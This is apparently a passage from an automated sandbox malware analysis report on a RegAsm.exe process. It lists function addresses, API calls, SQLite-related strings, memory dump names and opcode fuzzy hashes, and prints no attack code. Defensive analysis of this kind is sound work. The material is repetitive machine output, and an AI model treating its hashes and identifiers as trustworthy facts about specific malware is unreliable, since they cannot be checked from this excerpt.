Instruction Fuzzy Hash: 3A110831B0461097CB149E98DC40A6AB7A5EBA5714F10053FF512AF2C1DB78D945C7DD

Uniqueness

Uniqueness Score: -1.00%

Function 19855350 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

YHI;, xrefs: 19855353
F, xrefs: 1985539B

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: F$YHI;
API String ID: 0-79577134
Opcode ID: cd7d9f1c980c305fd36c7bfe6f54a9431e18a6499bd1913d7a0bb1a6907c238c
Instruction ID: 45f2b6c82792386342a6a23a41f674d1f620b499db3d81de3330494e41ef2813
Opcode Fuzzy Hash: cd7d9f1c980c305fd36c7bfe6f54a9431e18a6499bd1913d7a0bb1a6907c238c
Instruction Fuzzy Hash: 44113DB56083408FD704DF29C45175FBBE4AFD8214F88882EE88A87290E779E548CB93

Uniqueness

Uniqueness Score: -1.00%

Function 198D1F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

JSON path error near '%q', xrefs: 198D1F92

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: JSON path error near '%q'
API String ID: 0-481711382
Opcode ID: 886de46f0337bba5c9103697b4d02b8716ab2ae8b6e993b025226d791cc2dced
Instruction ID: bcc4724ef4987aea78553d888a0079092a7eb6acb4a01c1e4e7faecd63b77357
Opcode Fuzzy Hash: 886de46f0337bba5c9103697b4d02b8716ab2ae8b6e993b025226d791cc2dced
Instruction Fuzzy Hash: 730104B26092117FDB289A688C00B9B7BD4EF41730F28466CF495962D0EB71B841C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 19831DF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19831E53
misuse, xrefs: 19831E59
%s at line %d of [%.10s], xrefs: 19831E63

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 0a1906d73207f558ce61fbf1d1841cbc0b6a11db3f26222ae22eb8aab22e88c7
Instruction ID: 5e796d2158bbed2c6d0ddf07d661199cb2efe9c05b7b38e984f584cf747299ed
Opcode Fuzzy Hash: 0a1906d73207f558ce61fbf1d1841cbc0b6a11db3f26222ae22eb8aab22e88c7
Instruction Fuzzy Hash: 6211E0746085A09FD304DE38D844A56BBB8BF96F46F4C045CE045CB322C336EA09C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 1984F0E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1984F105

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
API String ID: 0-2312637080
Opcode ID: 8733d4323bb25e5110dda30ba5c01e322942fcac6a97825f2ac831515a8163c6
Instruction ID: 7faad72445b4834c44e96608e79f5f2c62b90b8604ed7f0eccc77acbfce9b373
Opcode Fuzzy Hash: 8733d4323bb25e5110dda30ba5c01e322942fcac6a97825f2ac831515a8163c6
Instruction Fuzzy Hash: 2A01B13A3042415FD3628A6EFC84F97B7E8EBD4620F1D046EF5ADC3201D361A88593A1

Uniqueness

Uniqueness Score: -1.00%

Function 19850D70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 19850D87

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
API String ID: 0-2312637080
Opcode ID: 646d5b929cf5b63477b04f10e33060be8b172283899f5433cf38f47e20bda40a
Instruction ID: f7a4690a790f86e0ccd2ac3cce3000c21813ed6fab39d35d08bea2d9be00b1e4
Opcode Fuzzy Hash: 646d5b929cf5b63477b04f10e33060be8b172283899f5433cf38f47e20bda40a
Instruction Fuzzy Hash: D7018176204204AFE3509A5DEC80F42B7E9EB88714F58455DF54DD7280D776FC86C750

Uniqueness

Uniqueness Score: -1.00%

Function 19899180 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

%s_stat, xrefs: 19899192

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s_stat
API String ID: 0-920702477
Opcode ID: 6bdd0e9ec9f709b23b493a18e1129689f7fc2b3416acc2318971bf0a7fd1ce1b
Instruction ID: 66aabd7230a29cc94fdca9f48ca420bc925fa3c8ed325b68e3f9556ca221291a
Opcode Fuzzy Hash: 6bdd0e9ec9f709b23b493a18e1129689f7fc2b3416acc2318971bf0a7fd1ce1b
Instruction Fuzzy Hash: 4BF02733A082523BD70046BDFC80B46EBD9BB90560F9C862AE40C92144D326BCE183D1

Uniqueness

Uniqueness Score: -1.00%

Function 19847F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 19847F76

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
API String ID: 0-3072645960
Opcode ID: 1ff8609794c930cd2cc36cd238638aeab33a88679b1755f3cd785b88dd9c0d70
Instruction ID: de6602003c22cbeb465a0e8af2e0b8b1e6237833f22248b76185b2d420b5f57e
Opcode Fuzzy Hash: 1ff8609794c930cd2cc36cd238638aeab33a88679b1755f3cd785b88dd9c0d70
Instruction Fuzzy Hash: 13F0F67B60430247D7005F18FC01B8A77D4AFE0321FAD413EF8449B180E761E88A87A1

Uniqueness

Uniqueness Score: -1.00%

Function 0040F72E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,0040FB2C,00000000), ref: 0040F739
HeapAlloc.KERNEL32(00000000,?,0040FB2C,00000000), ref: 0040F740
wsprintfW.USER32 ref: 0040F751

Strings

%hs, xrefs: 0040F74B

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: decaaf6b8d3bdfb4ebfc7dc505aacbf9abaaa4ede5b0c59ee062add5b7845f6a
Instruction ID: d92555dba5bd375428afbadb2c2e0f07a688df5fab51d2089fb10193fcd4bcdb
Opcode Fuzzy Hash: decaaf6b8d3bdfb4ebfc7dc505aacbf9abaaa4ede5b0c59ee062add5b7845f6a
Instruction Fuzzy Hash: 0FD0A731740324BBD62027E4BC0EF667F6CEB05BA2F400030FA0DC6152C961441187EE

Uniqueness

Uniqueness Score: -1.00%

Function 19926B50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19926B50
cannot open file, xrefs: 19926B59
%s at line %d of [%.10s], xrefs: 19926B5E

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$cannot open file$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1799306995
Opcode ID: c7c9ff48b8790d245b879a035df16a61ceefc303509d7287d64bba92fbcd0e60
Instruction ID: 015416104eb1421208e2019fe270dd93b112a3d675cf28451c16372cbf20f579
Opcode Fuzzy Hash: c7c9ff48b8790d245b879a035df16a61ceefc303509d7287d64bba92fbcd0e60
Instruction Fuzzy Hash: EBB09B5559415076D701A658CC01FD63C1077D0D00FDDD854714537295D095C0D4D551

Uniqueness

Uniqueness Score: -1.00%

Function 19847DA0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cbd345ac3afc232f4f37ca8e15a1c5cd367880f5bd9466d67f2ee02193d351f
Instruction ID: 2aab99876b3f92e7c75eeda4377ba18ad98ef048ba51dc19e8ac8c321bf8db60
Opcode Fuzzy Hash: 1cbd345ac3afc232f4f37ca8e15a1c5cd367880f5bd9466d67f2ee02193d351f
Instruction Fuzzy Hash: F041EE366006059FD314DF18D980B12F7E0FF84324F28896EE94687AA2D772F891CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1984CAE0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 245aa9ccac96598925b1bceddeb8a94ee369d56682fef41a296c27c3f5d4ef8e
Instruction ID: e0e39838cc26d90159ddbac65004f5166e724b26ce86c843276986d5f60733a5
Opcode Fuzzy Hash: 245aa9ccac96598925b1bceddeb8a94ee369d56682fef41a296c27c3f5d4ef8e
Instruction Fuzzy Hash: 3B31C2B6B053059FD710CF68E840B9AB3E8FF94321F28897EE905C7690E325E944D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 1984B1F0 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction ID: 7bff542cf5cd075f5e05602355697a0e5bc06f49aa4bb95fc35a2a0d303d2bf3
Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction Fuzzy Hash: 2A31AD75504B959BD324CB29F84079EB7E0BFA9314F28892ED89A83A40D332F498C791

Uniqueness

Uniqueness Score: -1.00%

Function 0041017A Relevance: 6.1, APIs: 4, Instructions: 92stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041017F
strtok_s.MSVCRT ref: 004101A6
StrCmpCA.SHLWAPI(00000000,00424468,?,?,?,?,00415701), ref: 004101D7
strtok_s.MSVCRT ref: 00410238

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$H_prolog
String ID:
API String ID: 1158113254-0
Opcode ID: e7445b8ad0cf16fa368b4061095d3ac76da92b0ea8b5ce5afeb953bf5f5f6c20
Instruction ID: c1a0159c24e06e7e6c0f372b1166df1df519fc89697668f976349a7732d3506c
Opcode Fuzzy Hash: e7445b8ad0cf16fa368b4061095d3ac76da92b0ea8b5ce5afeb953bf5f5f6c20
Instruction Fuzzy Hash: 0D21F771600606ABCB18DFA1E9C5AEBB3A8EF14304B10847FE416D7591DBB8EDC4C654

Uniqueness

Uniqueness Score: -1.00%

Function 19A1F4CA Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 19A1F4E0
GetLastError.KERNEL32(?,?,?,?), ref: 19A1F4ED
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 19A1F513
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 19A1F539

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 1216b5c90f2743a6bd2e117506ce811a61a3532f0ead945120973d1fb8fff686
Instruction ID: c101f772e394ccdaf386c18e719012d05a3e6b4a04e1414d00742a717d4b3378
Opcode Fuzzy Hash: 1216b5c90f2743a6bd2e117506ce811a61a3532f0ead945120973d1fb8fff686
Instruction Fuzzy Hash: 36112A719001A9BFDF109F69CC48DDE3F7DEF00760F144154F8289A1A0D7319659DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00417B21 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00417B47

Part of subcall function 00417973: __fltout2.LIBCMT ref: 0041799E

__cftog_l.LIBCMT ref: 00417B6D
__cftoe_l.LIBCMT ref: 00417B9F

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

